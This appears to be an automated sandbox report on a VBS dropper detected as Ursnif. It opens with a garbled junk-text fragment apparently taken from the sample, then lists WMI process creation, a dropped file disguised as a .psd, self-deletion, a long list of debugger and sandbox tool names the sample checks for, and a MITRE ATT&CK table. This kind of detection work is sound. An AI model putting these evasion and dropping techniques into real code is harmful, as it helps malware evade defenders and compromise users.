shorthand End IfREM prosody indices. 2301989 booky875 Swede hardcopy lessee devotion507, 9597409 Congo542 commandant493 Syria. bakery692. tori bushy560 highball nugget401 bedfast Copenhagen down commensurate dot paragon574 surname spree clairvoyant664 Oneida Bose636 CDC panicky. 851619 begetting. 5002303 bifocal945 Bushnell134 prick827 planeload113 equatorial187. keelson slapstick merchant511 nor contrabass leggy cluster Stewart rheostat Essen471 spheric re lobby henceforth merrymake spangle Leland contain Standish crutch607 blowup smuggle Wittgenstein650 fugal, 745304 Thessaly. 9793611 conqueror851 Casanova770 transferral spear282 indecomposable Macedonia ecosystem poison pathogenic, skipjack idyllic980 solitude moose Palomar Knapp un shrimp archetype yarn Multics radian Howe291 Cowan Caldwell, converge aching isocline Bavaria variable otiose977 voyage paper, autopilot332 NextIf ISsAHR ThenAYdtfwwDEnd If' minesweeper548 violin603, glove scowl mignon40 Markov lovebird, thirst godmother Mukden Cranford. gunmen Wilma genealogy ski tokamak947 abetting ecosystem715 apocalyptic, sora tyrannicide serf resist Eduardo Christensen Catherwood disrupt mercurial seaboard, 6929809 rein933 fin extent210 polytope. qua modern10 . indelicate lycopodium explicate hesi

            Persistence and Installation Behavior:

            barindex
            Creates processes via WMIShow sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\ogress.psdJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\ogress.psdJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.333764554.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.333746168.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.333656337.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1265151997.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.333680553.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.333618475.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.333591183.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.333702930.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.333727521.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Deletes itself after installationShow sources
            Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\j2trdiohfe7b.vbsJump to behavior
            Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: wscript.exe, 00000000.00000003.217599547.0000021E5255F000.00000004.00000001.sdmpBinary or memory string: EMUL.EXE
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmpBinary or memory string: AUTORUNSC.EXE
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmpBinary or memory string: SBIECTRL.EXE
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmpBinary or memory string: APISPY.EXE
            Source: wscript.exe, 00000000.00000003.217599547.0000021E5255F000.00000004.00000001.sdmpBinary or memory string: $FAKEHTTPSERVER.EXE
            Source: wscript.exe, 00000000.00000003.237796755.0000021E5253C000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE@
            Source: wscript.exe, 00000000.00000003.217599547.0000021E5255F000.00000004.00000001.sdmpBinary or memory string: REGMON.EXEIK
            Source: wscript.exe, 00000000.00000003.217599547.0000021E5255F000.00000004.00000001.sdmpBinary or memory string: WINDBG.EXE
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmpBinary or memory string: SBIESVC.EXE
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmpBinary or memory string: SCKTOOL.EXE;HQ
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmpBinary or memory string: IDAQ.EXET
            Source: wscript.exe, 00000000.00000003.237796755.0000021E5253C000.00000004.00000001.sdmpBinary or memory string: BEHAVIORDUMPER.EXE@Q
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmpBinary or memory string: IMPORTREC.EXE
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmpBinary or memory string: IMUL.EXE.8
            Source: wscript.exe, 00000000.00000003.217599547.0000021E5255F000.00000004.00000001.sdmpBinary or memory string: WINDUMP.EXE
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmpBinary or memory string: Q?$SANDBOXIERPCSS.EXEV5
            Source: wscript.exe, 00000000.00000003.237796755.0000021E5253C000.00000004.00000001.sdmpBinary or memory string: IDAG.EXE@:V
            Source: wscript.exe, 00000000.00000003.237796755.0000021E5253C000.00000004.00000001.sdmpBinary or memory string: IMPORTREC.EXE@
            Source: wscript.exe, 00000000.00000003.237796755.0000021E5253C000.00000004.00000001.sdmpBinary or memory string: HOOKEXPLORER.EXE@
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmpBinary or memory string: PEID.EXE#Z
            Source: wscript.exe, 00000000.00000003.237796755.0000021E5253C000.00000004.00000001.sdmpBinary or memory string: IDAQ.EXE
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmpBinary or memory string: SYSANALYZER.EXEA
            Source: wscript.exe, 00000000.00000003.237796755.0000021E5253C000.00000004.00000001.sdmpBinary or memory string: APISPY.EXE@
            Source: wscript.exe, 00000000.00000003.237796755.0000021E5253C000.00000004.00000001.sdmpBinary or memory string: IMUL.EXE@.8
            Source: wscript.exe, 00000000.00000003.237796755.0000021E5253C000.00000004.00000001.sdmpBinary or memory string: SCKTOOL.EXEH
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXEJ
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmpBinary or memory string: OLLYDBG.EXE
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmpBinary or memory string: HOOKEXPLORER.EXE
            Source: wscript.exe, 00000000.00000003.217599547.0000021E5255F000.00000004.00000001.sdmpBinary or memory string: NETSNIFFER.EXEK
            Source: wscript.exe, 00000000.00000003.237796755.0000021E5253C000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXE@J
            Source: wscript.exe, 00000000.00000003.237796755.0000021E5253C000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE@
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
            Source: wscript.exe, 00000000.00000003.217599547.0000021E5255F000.00000004.00000001.sdmpBinary or memory string: FILEMON.EXET
            Source: wscript.exe, 00000000.00000003.217599547.0000021E5255F000.00000004.00000001.sdmpBinary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmpBinary or memory string: TCPDUMP.EXE
            Source: wscript.exe, 00000000.00000003.237796755.0000021E5253C000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE@
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmpBinary or memory string: A9$BEHAVIORDUMPER.EXEQ
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmpBinary or memory string: IDAG.EXE:V
            Source: wscript.exe, 00000000.00000003.217599547.0000021E5255F000.00000004.00000001.sdmpBinary or memory string: REGSHOT.EXE
            Source: wscript.exe, 00000000.00000003.237796755.0000021E5253C000.00000004.00000001.sdmpBinary or memory string: SYSANALYZER.EXE@A
            Source: wscript.exe, 00000000.00000003.217599547.0000021E5255F000.00000004.00000001.sdmpBinary or memory string: DUMPCAP.EXE
            Source: wscript.exe, 00000000.00000003.217599547.0000021E5255F000.00000004.00000001.sdmpBinary or memory string: WIRESHARK.EXE
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmpBinary or memory string: FORTITRACER.EXEA
            Source: C:\Windows\System32\wscript.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ogress.psdJump to dropped file
            Source: C:\Windows\System32\wscript.exe TID: 1912Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformation
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.ini
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\Temp
            Source: ogress.psd.0.drBinary or memory string: /ku ridg;> on g,saiprlFsF/o( gtts

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Benign windows process drops PE filesShow sources
            Source: C:\Windows\System32\wscript.exeFile created: ogress.psd.0.drJump to dropped file
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmpBinary or memory string: procmon.exe
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmpBinary or memory string: tcpview.exe
            Source: wscript.exe, 00000000.00000003.217599547.0000021E5255F000.00000004.00000001.sdmpBinary or memory string: wireshark.exe
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmpBinary or memory string: avz.exe
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmpBinary or memory string: cports.exe
            Source: wscript.exe, 00000000.00000003.217599547.0000021E5255F000.00000004.00000001.sdmpBinary or memory string: lordpe.exe
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmpBinary or memory string: icesword.exe
            Source: wscript.exe, 00000000.00000003.237796755.0000021E5253C000.00000004.00000001.sdmpBinary or memory string: autoruns.exe
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmpBinary or memory string: ollydbg.exe
            Source: wscript.exe, 00000000.00000003.217599547.0000021E5255F000.00000004.00000001.sdmpBinary or memory string: regshot.exe

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.333764554.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.333746168.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.333656337.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1265151997.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.333680553.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.333618475.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.333591183.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.333702930.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.333727521.0000000005578000.00000004.00000040.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.333764554.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.333746168.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.333656337.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1265151997.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.333680553.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.333618475.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.333591183.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.333702930.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.333727521.0000000005578000.00000004.00000040.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation121DLL Side-Loading1Process Injection1Masquerading11OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScripting121Boot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion4LSASS MemorySecurity Software Discovery141Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsExploitation for Client Execution1Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerVirtualization/Sandbox Evasion4SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting121NTDSFile and Directory Discovery2Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsSystem Information Discovery25SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsFile Deletion1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet